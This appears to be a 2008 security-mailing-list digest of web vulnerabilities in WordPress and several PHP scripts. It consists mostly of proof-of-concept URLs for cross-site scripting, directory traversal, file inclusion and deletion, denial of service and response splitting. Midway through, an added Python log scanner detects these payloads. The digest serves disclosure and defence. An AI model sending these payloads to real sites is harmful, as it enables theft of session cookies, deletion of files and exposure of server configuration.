vuln-summary.txt

Published: 03 Jan 2008. Reported by websecurity.com.ua. Type: packetstorm. Source: packetstormsecurity.com

List of previously unpublished English vulnerabilities and their original source

Dear bugtraq,  
  
Below is a digest of vulnerabilities published by  
http://securityvulns.com/ and believed to be previously unpublished in  
English. All vulnerabilities were reported by MustLive  
(http://websecurity.com.ua/).  
  
1. AwesomeTemplateEngine cross-site scripting  
  
Multiple cross-site scripting (requires register_globals):  
  
http://site/templates/example_template.php?data[title]=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
http://site/templates/example_template.php?data[message]=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
http://site/templates/example_template.php?data[table][1][item]=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
http://site/templates/example_template.php?data[table][1][url]=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
http://site/templates/example_template.php?data[poweredby]=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
Original article (in Russian): http://securityvulns.ru/Sdocument784.html  
Additional details (in Ukrainian): http://websecurity.com.ua/1694/  
  
2. Wordpress multiple security vulnerabilities:  
  
2.1 information disclosure (WordPress 2.2/2.3)  
  
An invalid request discloses the database structure and local paths:  
  
http://site/?feed=rss2&p=1  
  
Original article (in Russian): http://securityvulns.ru/Sdocument663.html  
Additional details (in Ukrainian): http://websecurity.com.ua/1634/  
  
2.2 cross-site scripting (WordPress <= 2.0.9)  
  
http://site/wp-admin/post.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22  
http://site/wp-admin/page-new.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22  
  
Original article (in Russian): http://securityvulns.ru/Sdocument714.html  
Additional details (in Ukrainian): http://websecurity.com.ua/1658/  
  
2.3 Directory traversal, Arbitrary file deletion, Denial of Service  
and Cross-Site Scripting via wp-db-backup.php  
  
Directory Traversal (WordPress <= 2.0.3):  
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess  
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess  
  
Arbitrary file deletion and DoS (WordPress <= 2.0.3):  
  
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess  
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess  
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.php  
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\index.php  
  
XSS (WordPress <= 2.0.11 and potentially 2.1.x, 2.2.x, 2.3.x):  
  
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
Original article (in Russian): http://securityvulns.ru/Sdocument755.html  
Additional details (in Ukrainian): http://websecurity.com.ua/1676/  
  
2.4 Local file include, Directory traversal and Full path disclosure  
(WordPress <= 2.0.11 and potentially 2.1.x, 2.2.x, 2.3.x)  
  
Full path disclosure:  
  
http://site/wp-admin/admin.php?import=\..\..\wp-config  
http://site/wp-admin/themes.php?page=  
http://site/wp-admin/edit.php?page=  
http://site/wp-admin/admin.php?page=  
http://site/wp-admin/templates.php?file=  
http://site/wp-admin/templates.php?page=  
http://site/wp-admin/edit-pages.php?page=  
http://site/wp-admin/categories.php?page=  
http://site/wp-admin/edit-comments.php?page=  
http://site/wp-admin/moderation.php?page=  
http://site/wp-admin/post.php?page=  
http://site/wp-admin/page-new.php?page=  
http://site/wp-admin/index.php?page=  
http://site/wp-admin/link-manager.php?page=  
http://site/wp-admin/link-add.php?page=  
http://site/wp-admin/link-categories.php?page=  
http://site/wp-admin/link-import.php?page=  
http://site/wp-admin/theme-editor.php?page=  
http://site/wp-admin/plugins.php?page=  
http://site/wp-admin/plugin-editor.php?page=  
http://site/wp-admin/profile.php?page=  
http://site/wp-admin/users.php?page=  
http://site/wp-admin/options-general.php?page=  
http://site/wp-admin/options-writing.php?page=  
http://site/wp-admin/options-reading.php?page=  
http://site/wp-admin/options-discussion.php?page=  
http://site/wp-admin/options-permalink.php?page=  
http://site/wp-admin/options-misc.php?page=  
http://site/wp-admin/import.php?page=  
http://site/wp-admin/admin.php?page=  
http://site/wp-admin/admin-footer.php  
http://site/wp-admin/admin-functions.php  
http://site/wp-admin/edit-form.php  
http://site/wp-admin/edit-form-advanced.php  
http://site/wp-admin/edit-form-comment.php  
http://site/wp-admin/edit-link-form.php  
http://site/wp-admin/edit-page-form.php  
http://site/wp-admin/menu.php  
http://site/wp-admin/menu-header.php  
http://site/wp-admin/import/blogger.php  
http://site/wp-admin/import/dotclear.php  
http://site/wp-admin/import/greymatter.php  
http://site/wp-admin/import/livejournal.php  
http://site/wp-admin/import/mt.php  
http://site/wp-admin/import/rss.php  
http://site/wp-admin/import/textpattern.php  
http://site/wp-admin/bookmarklet.php?page=  
http://site/wp-admin/cat-js.php?page=  
http://site/wp-admin/inline-uploading.php?page=  
http://site/wp-admin/options.php?page=  
http://site/wp-admin/profile-update.php?page=  
http://site/wp-admin/sidebar.php?page=  
http://site/wp-admin/user-edit.php?page=  
  
Local file include and Directory traversal:  
  
http://site/wp-admin/admin.php?import=\..\..\file  
http://site/wp-admin/themes.php?page=\..\..\file.php  
http://site/wp-admin/themes.php?page=\..\..\.htaccess  
http://site/wp-admin/edit.php?page=\..\..\file.php  
http://site/wp-admin/edit.php?page=\..\..\.htaccess  
http://site/wp-admin/admin.php?page=\..\..\file.php  
http://site/wp-admin/admin.php?page=\..\..\.htaccess  
http://site/wp-admin/templates.php?page=\..\..\file.php  
http://site/wp-admin/templates.php?page=\..\..\.htaccess  
http://site/wp-admin/edit-pages.php?page=\..\..\.htaccess  
http://site/wp-admin/categories.php?page=\..\..\.htaccess  
http://site/wp-admin/edit-comments.php?page=\..\..\.htaccess  
http://site/wp-admin/moderation.php?page=\..\..\.htaccess  
http://site/wp-admin/post.php?page=\..\..\.htaccess  
http://site/wp-admin/page-new.php?page=\..\..\.htaccess  
http://site/wp-admin/index.php?page=\..\..\file.php  
http://site/wp-admin/index.php?page=\..\..\.htaccess  
http://site/wp-admin/link-manager.php?page=\..\..\.htaccess  
http://site/wp-admin/link-add.php?page=\..\..\.htaccess  
http://site/wp-admin/link-categories.php?page=\..\..\.htaccess  
http://site/wp-admin/link-import.php?page=\..\..\.htaccess  
http://site/wp-admin/theme-editor.php?page=\..\..\.htaccess  
http://site/wp-admin/plugin-editor.php?page=\..\..\.htaccess  
http://site/wp-admin/profile.php?page=\..\..\.htaccess  
http://site/wp-admin/users.php?page=\..\..\.htaccess  
http://site/wp-admin/options-general.php?page=\..\..\.htaccess  
http://site/wp-admin/options-writing.php?page=\..\..\.htaccess  
http://site/wp-admin/options-reading.php?page=\..\..\.htaccess  
http://site/wp-admin/options-discussion.php?page=\..\..\.htaccess  
http://site/wp-admin/options-permalink.php?page=\..\..\.htaccess  
http://site/wp-admin/options-misc.php?page=\..\..\.htaccess  
http://site/wp-admin/import.php?page=\..\..\.htaccess  
http://site/wp-admin/admin.php?page=\..\..\.htaccess  
http://site/wp-admin/bookmarklet.php?page=\..\..\.htaccess  
http://site/wp-admin/cat-js.php?page=\..\..\.htaccess  
http://site/wp-admin/inline-uploading.php?page=\..\..\.htaccess  
http://site/wp-admin/options.php?page=\..\..\.htaccess  
http://site/wp-admin/profile-update.php?page=\..\..\.htaccess  
http://site/wp-admin/sidebar.php?page=\..\..\.htaccess  
http://site/wp-admin/user-edit.php?page=\..\..\.htaccess  
  
Arbitrary file edit:  
  
http://site/wp-admin/templates.php?file=\..\..\file  
  
Attacks using backslashes are possible in the Windows version.  
  
Original article (in Russian):  
http://securityvulns.ru/Sdocument762.html  
http://securityvulns.ru/Sdocument768.html  
http://securityvulns.ru/Sdocument773.html  
http://securityvulns.ru/Sdocument772.html  
Additional details (in Ukrainian):  
http://websecurity.com.ua/1679/  
http://websecurity.com.ua/1683/  
http://websecurity.com.ua/1686/  
http://websecurity.com.ua/1687/  
  
  
3. Cross-site scripting and Denial of Service in PRO-Search <= 0.17  
  
XSS:  
  
http://site/?prot=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
http://site/?host=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
http://site/?path=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
http://site/?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
http://site/?ext=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
http://site/?size=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
http://site/?search_days=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
http://site/?show_page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
Denial of Service:  
  
http://site/?show_page=20000&time=0  
  
Original article (in Russian): http://securityvulns.ru/Sdocument731.html  
Additional details (in Ukrainian): http://websecurity.com.ua/1259/  
  
4. Persistent cross-site scripting and request forgery in WP-ContactForm  
<= 1.5 alpha (WordPress plugin)  
  
POST request to  
  
http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php  
  
with different form fields.  
  
Exploits:  
  
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS.html  
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS2.html  
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS3.html  
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS4.html  
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF5.html  
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS5.html  
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS6.html  
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS7.html  
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF8.html  
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS8.html  
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF9.html  
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS9.html  
  
Original article (in Russian):  
http://securityvulns.ru/Sdocument667.html  
http://securityvulns.ru/Sdocument546.html  
Additional details (in Ukrainian):  
http://websecurity.com.ua/1641/  
http://websecurity.com.ua/1600/  
  
5. RotaBanner Local <= 3 cross-site scripting  
  
http://site/account/index.html?user=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
http://site/account/index.html?drop=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
Original article (in Russian): http://securityvulns.ru/Sdocument625.html  
Additional details (in Ukrainian): http://websecurity.com.ua/1442/  
  
  
6. ExpressionEngine <= 1.2.1 response splitting and cross-site scripting  
  
http://site/index.php?URL=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
Original article (in Russian): http://securityvulns.ru/Sdocument472.html  
Additional details (in Ukrainian): http://websecurity.com.ua/1454/  
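The payload shapes in items 1 through 6 (traversal through the wp-admin `page`/`backup` parameters in both `../` and Windows `\..\` forms, script tags in query parameters, and the `%0A` response splitting in item 6) are easy to spot in web-server access logs. The following scanner is an added example for defenders, not code from the digest or its author; the log lines it runs on are constructed to match the payload shapes above, and the finding labels are my own.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (not from the advisory), shaped like the payloads
# the digest lists: traversal via wp-admin "page"/"backup" (slash and backslash
# forms), script-tag XSS in query parameters, and %0A response splitting.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Jan/2008:10:00:01 +0000] "GET /wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess HTTP/1.1" 200 512
10.0.0.5 - - [03/Jan/2008:10:00:02 +0000] "GET /wp-admin/themes.php?page=%5C..%5C..%5Cfile.php HTTP/1.1" 200 40
10.0.0.7 - - [03/Jan/2008:10:00:03 +0000] "GET /?prot=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 1034
10.0.0.8 - - [03/Jan/2008:10:00:04 +0000] "GET /index.php?URL=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 302 0
10.0.0.9 - - [03/Jan/2008:10:00:05 +0000] "GET /wp-admin/edit.php?page=wp-db-backup.php HTTP/1.1" 200 2200
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
CHECKS = (
    ("traversal", re.compile(r"\.\.[\\/]")),        # ../ or the Windows ..\ form
    ("crlf", re.compile(r"[\r\n]")),                # header injection / response splitting
    ("script tag", re.compile(r"<\s*script", re.IGNORECASE)),
)


def normalise(value):
    """parse_qsl decoded once already; decode up to two more times (e.g. %255C)."""
    for _ in range(2):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(target):
    """Return findings such as 'traversal in backup' for one request target."""
    findings = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = normalise(raw)
        for label, pattern in CHECKS:
            if pattern.search(value):
                findings.append(f"{label} in {name}")
    return findings


def scan_log(text):
    """Map each suspicious log line number to its list of findings."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if match:
            findings = classify_request(match.group(1))
            if findings:
                hits[lineno] = findings
    return hits
```

Line 5 of the sample, a legitimate `page=wp-db-backup.php` request, produces no finding, which is the false-positive check worth keeping when tuning the patterns.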
  
-=-=-=-  
  
There are also a few vulnerabilities published in English as part of  
the Month of Bugs in CAPTCHA:  
  
Cryptographp <= 1.2 WordPress plugin multiple persistent cross-site  
scriptings  
  
Original article: http://websecurity.com.ua/1596/  
  
XSS in Math Comment Spam Protection < 2.2  
  
Original article: http://websecurity.com.ua/1576/  
  
XSS in Captcha! <= 2.5d  
  
Original article: http://websecurity.com.ua/1588/  
  
  
  
--   
http://securityvulns.com/  
/\_/\  
{ , . } |\  
+--oQQo->{ ^ }<-----+ \  
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)  
+-------------o66o--+ /  
|/  
